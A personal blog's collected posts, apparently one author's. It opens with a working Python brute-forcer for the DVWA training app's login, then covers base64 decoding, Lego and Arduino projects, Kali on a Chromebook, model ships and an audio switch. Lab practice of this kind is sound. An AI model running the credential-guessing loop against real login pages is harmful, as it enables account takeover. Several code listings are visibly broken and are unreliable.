DVWA login brute-forcer in Python

I recently started playing around with the Damn Vulnerable Web Application, a PHP/MySQL web app for security researchers and students. It is, as the name implies, damn vulnerable.

After installation of DVWA you’ll be presented with a login page. Unless you supply the user and password from the manual you’ll have to get access some other way. Fruitlessly trying some SQL injection I decided to simply brute force the login, and used Burp Suite to get some more information. Turns out that all you need to login is the username, password, user token and a session id. The session id is provided in a cookie, the user token by the login page, and the username and password is of course what we need to find.

<input name="user_token" type="hidden" value="d3b0fabcd22dd8ad5f202f508777f8b8" />

While manually supplying a few user names and passwords I found out that the login page responds with a 302 Found HTTP response, either forwarding back to the login page in case of a failed login, or to index.php in case of a successful login (I already knew the default user name and password from the manual). Going back to the index.php resulted in a new user token being generated, but ignoring the forward meant I could continue supplying the same user token again and again.

I wrote the brute forcer in python using BeautifulSoup, requests and re, all python modules. The program is pretty simple: request the login page, find and extract the user token from within the login page, get the session id from the cookie, and return these plus a random username and password with a HTTP POST method.

Running this script with a supplied list of user names and passwords meant I was able to find the login in just a few seconds. The script is tailored to DVWA but could easily be customised for other vulnerable sites.


from bs4 import BeautifulSoup
import requests
import re

# url to attack
url = ""

# get users
user_file = "users.txt"
fd = open(user_file, "r")
users = fd.readlines()

# get passwords
password_file = "passwords.txt"
fd = open(password_file, "r")
passwords = fd.readlines()

# Changes to True when user/pass found
done = False

print("Attacking " + url + "\n")

# Get login page
    r = requests.get(url, timeout=5)
except ConnectionRefusedError:
    print("Unable to reach server! Quitting!")

# Extract session_id (next 2 lines are from https://blog.g0tmi1k.com/dvwa/login/)
session_id = re.match("PHPSESSID=(.*?);", r.headers["set-cookie"])
session_id = session_id.group(1)

print("Session_id: " + session_id)
cookie = {"PHPSESSID": session_id}

# prepare soup
soup = BeautifulSoup(r.text, "html.parser")

# get user_token value
user_token = soup.find("input", {"name":"user_token"})["value"]

print("User_token: " + user_token + "\n")

for user in users:
    user = user.rstrip()
    for password in passwords:
            if not done:
                password = password.rstrip()
                payload = {"username": user,
                    "password": password,
                    "Login": "Login",
                    "user_token": user_token}

                reply = requests.post(url, payload, cookies=cookie, allow_redirects=False)

                result = reply.headers["Location"]

                print("Trying: " + user + ", " + password, end="\r", flush=True)

                if "index.php" in result:
                    print("Success! \nUser: " + user + " \nPassword: " + password)
                    done = True

Decoding base64 in Python

This is a small tutorial for beginners on how to decode base64 text strings in Python3. While Python does have a function to directly encode and decode base64, it is always good practice to try and write one yourself if you are a new programmer.

Head over to Wikipedia to see how base64 is decoded. First, each character in the encoded string is assigned a number according to the base64 table. This number is then translated to 6 bit binary.

You can do this in Python by including the base64 table as a dictionary, and iterating through all characters in the encoded string, like this:

for char in string:
    if char in index.keys():
        bin_string += 

The last line formats the decimal value to 6-bit binary ({0:06b}). As the highest value in the base64 table is 63 (for the / character), 6 bits are exactly enough to hold it and no information will be lost (0b111111 = 63).

The above loop creates one long binary string (bin_string) which should now be partitioned in bytes (8 bits) and converted to ASCII. This can be accomplished with the following loop:

while len(bin_string) >= 8:
    byte = bin_string[1:8]
    char = chr(int(byte, 2))
    output += char
    bin_string = bin_string[8:]

This code iterates through the binary string until it’s less than 8 bits long (which should be the end), takes the first byte and converts it to ASCII (actually, Unicode) using the chr function. This could also be done by including an ASCII table and using that to convert, just like we did in the beginning with the base64 table. I’ll leave that as an exercise.
Finally, it removes the first byte from the binary string which we just converted, and the loop continues to the next byte.

If you use print(output) now, it should display the decoded string.

To make the script a little more intuitive you can incorporate the argparse module which allows the coded string to be included as an argument while running the script, like this:

python base64_decode.py --TWFu

Where ‘TWFu’ is an encoded string.

The code for argparse is as follows:

import argparse

parser = argparse.ArgumentParser(Description="")
parser.add_argument('--string', dest='string',     
args = parser.parse_args()

The string to decode then becomes args.string when called in the subsequent code.

Happy coding!

The full script can be found at github.

Lego 21309 Saturn V Review

In April 2017 Lego unveiled the new Lego Ideas Saturn V rocket, a project I had supported on Lego Ideas. As soon as I saw the final model and its price tag, I knew I had to get it.

The wait was rather long since it got sold out at the Lego online store on the very first day, but I was finally able to get it in July, around the time of the 48th anniversary of the first Moon landing (actually I built it around these days).

The set retails at 120€ and has 1969(!) pieces, and measures one meter high. It has an incredible attention to detail as you’ll see on the following photos.

Inside the box there are 12 numbered bags and an instruction manual with a short description of the real rocket and how the model was designed by Lego. Experienced Lego builders may notice there are no stickers: all parts are printed!

The stages of the rocket consist of an inner structure to give stability and to allow the outer panels to be attached. There’s a bunch of clever connections like seen above. The gap seen coincides with the riveted pieces that will be attached later.

Some steps are repeated four times like with the above panel pieces, but even so the model is a very interesting build.

Strange use of pieces

I did scratch my head a few times due to the strange use of pieces. The above 6×1 panel piece is attached with jumpers instead of 2×1 flat pieces. The only reason I can think of is to cut costs, I suppose jumpers are slightly cheaper that 2×1 pieces, allowing Lego to keep the price of the model low.

Instead of using a single trussed piece on the Launch Escape System Lego has used 16 nozzle pieces – genius! Since there’s a Technic axle through the center the structure is very solid and won’t come apart.

There’s an incredible level of detail to the F-1 engines on the first stage. the nozzles are made up of barrels in gun metal grey plastic.

1st and 2nd stages

The 1st and 2nd stage finished together with a drawing I once made through a telescope of some Lunar craters. The stages are very robust and don’t easily fall apart. While I wouldn’t want to drop them, I have no fear of handling them and they have a very satisfying ‘click’ when they are put together.

Lego astronaut to scale

Lego has included 4 micro figures to scale. I’m not sure who the 4th astronaut is supposed to be, but here’s Mike Collins to indicate the gigantic proportions of the rocket. Truly a magnificent machine!

CSM splashed down and LEM on the Moon

Apart from the rocket, two smaller ‘vignettes’ are included: The Lunar Excursion Module (LEM) touched down on the Moon with Neil Armstrong and Buzz Aldrin, and the CM splashed down on Earth. The LEM can be put inside the rocket in its proper place just behind the CSM, while there’s an extra CM with its white protective cover for use on the rocket.


Another way to display the CSM and LEM as they would be on their way to and around the Moon. This does however use the Service Module from the rocket, as there are no spares.

A closer look at the 2nd stage. The black dots is a printed piece, as well as the lettering of course. Both the 1st and 2nd stages are almost completely round, and made up of 2×3 curved pieces. I believe the technical term is SNOT, Studs Not On Top.

Lego Saturn V on stands

And lastly, the Lego Saturn V in all its glory! At 1 meter long, the model is a sight to behold, and in my opinion very well worth its 120€ price tag.

As a child I had dozens of Lego kits and several Lego Technic kits when I got older. In my opinion, the Saturn V is the best set Lego has ever made. It is a decorative, well-detailed model that is fun to build and stays very true to the original rocket. It is also very educational, since it allows one to simulate the Moon mission in all its steps. It’s no wonder it’s completely sold out everywhere as of the time of writing, but more will be on the way.

Arduino Lego Robot – Update 2

Eyes and Brainz

In the past few days I’ve been busy installing the brain of my Arduino Lego robot, namely the Raspberry Pi, and making a mount for the Raspberry Camera to allow it to pan and tilt. If you haven’t read the first entry of my robot blog, you can do so here.

The Raspberry Pi is running Gentoo Linux, my favourite Linux distro. Installation was straightforward using the wiki and cross-compiling the software on my Gentoo desktop. The Arduino is connected directly to the Raspberry via USB and communicates over serial. All my robot code is done in Python (except for C++ for the Arduino), but since I’m still working on that I’ll focus on the mechanical parts in this blog update.

At this point the robot is basically completed mechanically.

I’ve installed the Raspberry Pi on top of the robot with some strategically placed Lego beams and axles. It sits just clear of the Arduino and its shield underneath it. The power supply for the Raspberry is a mobile phone power pack slung underneath the robot with rubber bands. The Arduino uses a 9V battery which also powers the 2 servo motors for the camera mount. Lastly, the robot Lego motors are powered by a Lego 9V (actually 7,2V) power pack on the back.

Underside view showing the battery pack for the Raspberry Pi and the 2 Lego motors.

I’m communicating with the robot via WiFi from either my desktop PC or laptop. At this time I just connect the Raspberry to my router but I’ll probably make a hotspot on my laptop to be able to take the robot out into the field. Since communications never leave the LAN I don’t experience too much lag and can easily pilot the robot in real time.

Camera mount

For the camera mount I chose not to use Lego parts as it would become too bulky and I couldn’t really find a way to attach the servos to them without having to modify the Lego parts. Only the lower servo is attached to Lego, for the upper servo I made a simple frame from some spare metal and attached that to the servo plastic arms. The camera is attached to the upper servo with double-sided tape.

Due to the limitations of the servos the camera rotates only +/- 50 degrees from center (up and down). I think the servos are good up till +/- 70 degrees but I prefer to keep a margin not to damage them. As of now the camera is controlled from the PC with the arrow keys in 10 degree increments and a key to recenter it. It works well, but I’ll probably look into programming a more fluid movement, possibly using a gamepad.

Front View

My next task will be modifying the code to show the live video feed within Pygame instead of a separate VLC window, and generally modifying and cleaning up my code. Especially the networking part needs a good look through.

Whenever I have something new to show I’ll write the next entry, but expect it to be focused on the software not the hardware. Oh, and I’ll soon make a video of the robot in action!

Arduino Lego Robot – Update 1

I’ve been building  an Arduino powered Lego tracked robot on and off for the past half year, and have finally come to the point where there’s something to show.

I didn’t take long to realize that I had to become proficient in programming and not just patch together other people’s code from the web, so I took a crash course in Python (using the excellent book Python Crash Course by Eric Matthes) and became familiar with C and C++ for the Arduino code.

After a few months of coding I’m finally at the point where it is all coming together. I’ve had the basic Lego robot built for months but never really programmed it to do anything other than running forward and stopping. The robot is built of parts from the Lego Crawler Crane kit (#42042), it’s basically the tracked base with some modifications like a motor for each track to allow steering. The motors are controlled via the Arduino (see my first blog entry), which in turn is controlled with a Python program on my PC via the serial monitor. The plan is to have a Raspberry Pi as the onboard PC, which in turn will be controlled via Wifi from another PC or laptop.

Back view of the robot

Top View

At the moment the robot is controlled with a simple Python program using the WASD keyboard keys, allowing forward and backward movement and turning. This works relatively well, with about a 1 second delay.

I took the video below when testing the serial communications; at that point I had only programmed forward movement.

I have attached the Arduino code below. It waits for a serial command to actuate the motors. If you intend to use this code yourself, be aware that some lines may be split because of the narrow WordPress theme format (should be fixed by now).

// Tank movement controlled via serial commands
// Works with Adafruit Motor Shield v.2.3
// Written by Kenneth Larsen, 2017

#include <Wire.h>
#include <Adafruit_MotorShield.h>
#include "utility/Adafruit_MS_PWMServoDriver.h"

// Create the motor shield object with the default I2C address
Adafruit_MotorShield AFMS = Adafruit_MotorShield();

// Select ports for motors: M1 - M4. 
Adafruit_DCMotor *Motor1 = AFMS.getMotor(1);
Adafruit_DCMotor *Motor2 = AFMS.getMotor(2);

String input; // input for Serial
int c = -20; // error correction
int FULLSPEED = 255;
int HALFSPEED = 126;

void setup()
 AFMS.begin(); // create with the default frequency of 1,6KHz

void moveForward()
// Define forward movement
 Serial.println("Moving forward...");
 uint8_t i;
 for ( i = 30 ; i < 255 ; i++ ) // accelerate slowly
 Motor1->setSpeed(FULLSPEED); // maintain max speed

void moveBackward()
// Define backward movement
 Serial.println("Moving backward...");
 uint8_t i;
 for ( i = 30 ; i < 255 ; i++ ) // accelerate slowly
 Motor1->setSpeed(FULLSPEED); // maintain max speed

void turnLeft()
// Define left turns
 Serial.println("Turning left...");

void turnRight()
// Define right turns
 Serial.println("Turning right...");

void stopMovement()
// Define stopping
 Motor1->run(RELEASE); // stop motors

void loop()
 if (Serial.available() > 0)
 input = Serial.readString();
 if (input == "forward")
 if (input == "backward")
 if (input == "left")
 if (input == "right")
 if (input == "stop")

The Python code uses pygame to grab the keystrokes and send them to the Arduino via serial. I’ll split this program into two, one for the PC to send the commands and receive video, and another for the Raspberry Pi to forward the commands to the Arduino and send video directly from the Raspicam to the PC. This will be done over WiFi to make the robot completely cordless, and with better range than if I went with Bluetooth (and better security!).

# Serial control for Arduino robot
# Written by Kenneth Larsen, 2017
import serial, sys
import pygame

# Initialize pygame
pygame.display.set_caption("Robot Control Center")
screen = pygame.display.set_mode((640,480))

# Initialize serial connection
 ser = serial.Serial('/dev/ttyACM1', 115200)
except serial.serialutil.SerialException:
 ser = serial.Serial('/dev/ttyACM0', 115200)
 except serial.serialutil.SerialException:
 print("No serial connection found. Is the Arduino connected?\n")

# Define stop keys. Releasing any of these keys will cause the robot to stop
stopkeys = (pygame.K_w, pygame.K_a, pygame.K_s, pygame.K_d)

def quitprogram():
 """Handles program shut down."""
 print("Stopping robot and exiting...\n")
 # Stop motors

# Main loop
while True:
 for event in pygame.event.get():
 if event.type == pygame.QUIT:
 # Keyboard controls
 if event.type == pygame.KEYDOWN:
 if event.key == pygame.K_q:
 if event.key == pygame.K_w:
 if event.key == pygame.K_s:
 if event.key == pygame.K_a:
 elif event.key == pygame.K_d:
 elif event.type == pygame.KEYUP:
 if event.key in stopkeys:
 #if event.key == pygame.K_w or pygame.K_s or pygame.K_a or pygame.K_d:
 # Update display

This is just the initial programming of the robot. I’ve tried to keep everything as simple as possible to assure that it all works.

Next step will be to get the Raspberry Pi on the robot and connect the Arduino directly to it. I’m currently experimenting with sending live video from the Raspberry over Python. The next update will hopefully focus on this, with the robot controlled over WiFi from a laptop.

Part 2 is now available!

Running Linux on the Asus C201PA Chromebook

I was recently looking for a cheap laptop to run Linux on, mostly for programming. I settled on the Asus C201PA Chromebook for two reasons: I have good experience with Asus Hardware, and there were many success stories of people running Linux on it.

Kali Linux have an image available for the Chromebook Flip, which is almost identical to the C201PA. Installation is really straightforward, but I’m going to detail how I did it here since I ran into a few issues.

First, put the Chromebook into Developer Mode (warning: this will erase all personal data in ChromeOS). This lets you boot other operating systems. To do this, hold down ESC + REFRESH (F3) and touch the Power button. When the Chromebook reboots, select Recovery, then press CTRL + D. This boots ChromeOS in Developer Mode.

Once booted, press CTRL + ALT + T to open the terminal. Write


to get the shell, then

sudo su

to get root. In order to boot Linux from a microSD or USB drive, run the command

crossystem dev_boot_usb=1

which enables USB booting.

Now you need to prepare the MicroSD (or USB) drive with Kali Linux. Download the Kali Linux image to your computer (or Chromebook) and run

xzcat kali-$version-veyron.img.xz | dd of=/dev/sdx bs=512k

Substituting $version with the specific version you downloaded. /dev/sdx would be your MicroSD card or USB drive (be extra careful to get it right, as the dd command will erase your drive!).

This is where I started to run into a small issue: The Kali image is made for an 8 GiB drive, and I was using a 16 GiB. This meant 8 GiB completely unusable space on the drive. To solve this, you need to use parted and cgpt (cgpt is part of vboot-utils) to change the size of the root partition:

parted /dev/sdx

Where /dev/sdx is once again your Kali drive. Parted will complain that not all the space appears to be used, and that it can fix it for you. Let it do so. Unfortunately, we are not done yet. If you try to boot Kali now, you will find that the drive is unbootable.

You’ll have to run

cgpt show /dev/sdx

And write down the number in the column Start at the row Sec GPT table. We need this number to calculate the size of the root partition for the next command:

cgpt add -i 2 -t data -b 40960 -s `expr X – 40960` -l Root /dev/sdx

where X is the number you just found. Careful, the “`” is the key to the left of the “1” (on UK keyboards).

Repair the partition layout using

cgpt repair /dev/sdx

Re-add the boot partitions by

cgpt add -i 1 -S 1 -T 5 -P 10 -l KERN-A /dev/sdx
cgpt add -i 2 -S 1 -T 5 -P 5 -l KERN-B /dev/sdx

And finally, expand the root filesystem by:

mount /dev/sdx2 /mnt/tmp

Assuming /mnt/tmp exits, and then

resize2fs /dev/sdx2


Finally, the microSD or USB drive is ready! Plug it into the Chromebook, power it on, and press CTRL + U at the white boot screen to boot from USB. Kali Linux should now boot and present you with the login screen. Username is root, password is toor.

You should change the root password with ‘passwd’, and if you decide to use Kali for everyday use, I’d recommend adding a new user with

useradd -m -s /bin/bash (username)
passwd (username)

And then install and use sudo for when you need elevated privileges.


Apart from Kali, it is also possible to install and run Arch Linux. I have it running on another microSD card, but have to solve some issues before I’m happy with it (probably related to the framebuffer).

I’ve also tried installing Gentoo Linux, and got as far as running it but was unable to get the network adaptors working. They need pre-compiled modules that I was not able to load. If I ever get it working, I’ll make a new blog post about it. Gentoo is what I’m running on my desktop and Raspberry Pi, and would prefer to run it on the Chromebook too.

I’m also debating whether to move Kali or Arch to the internal memory, wiping ChromeOS. I have still to make that decision, though.


  1. https://www.chromium.org/a/chromium.org/dev/chromium-os/developer-information-for-chrome-os-devices/generic
  2. http://docs.kali.org/kali-on-arm/kali-linux-asus-chromebook-flip
  3. https://forums.kali.org/showthread.php?27350-Chromebook-expand-resize-grow-partition-rootfs

My Model Shipyard

For the past 15 years or so I’ve been building model sailing ships on and off. This has resulted in 2 finished kit models, one of them modified, and one scratch-built model still under construction.

I’ve had some pictures of my ship models on several websites, but what with the nature of the web, most of these sites no longer exist.  For that reason I’ve decided to leave a few pictures on this blog, with a brief description of the ships.



This was the first kit model I finished, and while the subject is certainly not the most beautiful ship ever built, I was quite happy with the result. It’s a rather small ship and doesn’t have as many details as my later models.

HM Mortar Vessel Convulsion

Deck details


Continuing my theme with bomb vessels, I then built the “Granado”, a British bomb vessel from 1756. This is also a kit model, but I have made several modifications such as the hand-carved stern gallery and figurehead.

HM Bomb Vessel Granado

Stern details – the gallery is hand-carved from Swiss pear.

Hermes decorating the stem – with a bomb in his right hand!


Stern view


The current ship I’m building – and have been building for the past 9 years or so – is the USS Syren, a 18-gun brig of the fledgling US Navy of 1803. This is a scratch-built model made from plans acquired at Model Ship World.  As can be seen from the photos, it is far from finished and will take several years more to finish, especially at my current tortuous pace…

USS Syren

Carronade details

Head rails

Progress as of writing

I’d like to say that my skills have progressed noticeably since my first ship; unfortunately, that has come at the cost of slower progress, especially since I have a large amount of other hobbies demanding my time.


In the future, I’ll detail some specific parts of the construction of the USS Syren, which may be of interest to other model ship builders.

If you have any questions or comments, please don’t hesitate to contact me (contact details in ‘about’ in the upper right corner)!

Audio Selector

I usually change a lot between speakers and headphones on my PC – Speakers when I watch movies or listen to music, and headphones when I’m at the desktop. I hate having to insert and remove the jack every time I want to change, so about a year ago I bought a cheap audio selector from Amazon. That worked for about half a year until one channel started to become lower volume than the other. So instead of just buying some new cheap selector, I decided to channel my inner maker and make my own.

I decided to go with 3 outputs so I could connect an extra pair of speakers in the future. I was able to get some 3-input 2-position switches at my local electronics store that I could just wire with 1 input and 1 output to get the desired off-on effect.

The circuit is rather simple: connect the centre of all the switches to the input jack (red wire right speaker (ring), white wire left speaker (tip), black ground (sleeve)), and one side of each switch to an output jack (the 3rd side will be empty, corresponding to OFF).


Diagram shows only 2 switches, but can easily be expanded

Having taken some quick measurements (the box had to fit below my secondary monitor) I made a back-of-the-envelope draft of the design and collected the parts. For my design I needed 4 3,5mm female audio jacks, 2 male jacks (to connect the input side of the box to the PC), 3 switches and some cable.

Audio Selector - Pieces

I decided to go with American walnut for the box as I had several sheets lying around at varying thickness. I ended up using 4 mm thick sheets for the end pieces and 2 mm for the rest. The backside was problematic, the female audio jacks I had bought could only be screwed onto a plate of maximum 1 mm thickness, and walnut is rather brittle at that thickness. Eventually I found the lid of a plastic cookie box and used that for the back side. Cheap and easy!

Construction of the box was quick and straightforward:

Creating the box

Creating the box

Though soldering the switches and cables allowed me to practice some new swear words (I’ve never been good at soldering).

To finish the box I sanded it with some fine grit sandpaper and gave it a coat of linseed oil. In the future I might draw numbers or symbols over each switch on the front to identify it.

Audio Selector - Back

Viewed from the back. The red plate is from a cookie box.

Audio Selector - Front

Finished audio selector

All in all, this was a fun 2-day project for me. In total I think the parts cost me some 20€; I might have been able to get a finished box cheaper, though I’ve not had much luck finding any for sale, and the few on Amazon are either very expensive or poor quality.  I’m very happy with the result, the switches are nice to operate and the box is sturdy and looks good on my desk. And most importantly, you just can’t beat home-made electronics!

Arduino & Lego PF Motors

Working through the book Arduino Workshop by John Boxall I’ve finally come to the chapter describing how to build an Arduino Tank Robot. However, instead of buying a premade robot chassis I decided to make it out of Lego Technic instead, something I played a lot with as a child.

This presented me with some interesting challenges, first of all, how to interface the Lego Power Functions motors with the Arduino. Luckily, I’m not the first one doing this stuff, and I quickly found a great blog detailing how to cut the motor cables. As I didn’t want to permanently destroy the great Lego set I had just bought (the 42042 Crawler Crane), I bought some new cables and an extra motor from Lego.

Preparing the cables was easy: cut them, strip and tin the two outer wires for the battery pack (+9V and GND), and the two inner cables for the motors.


Cutting the cables (Lego fans should look away!)

To check if it all worked, I built a quick circuit with a TIP122 transistor according to this Arduino tutorial (though a bit simplified, I didn’t really need the switch). It worked perfectly, and I was able to control the motor speed with some simple PWM code. Next step was to run 2 motors off the Adafruit motor shield. As you can see in the video below, it all worked perfectly.

Jump on over to the first entry of how I built and programmed my Arduino Lego Robot: Arduino Lego Robot – Entry 1.


Arduino Lego Tank Robot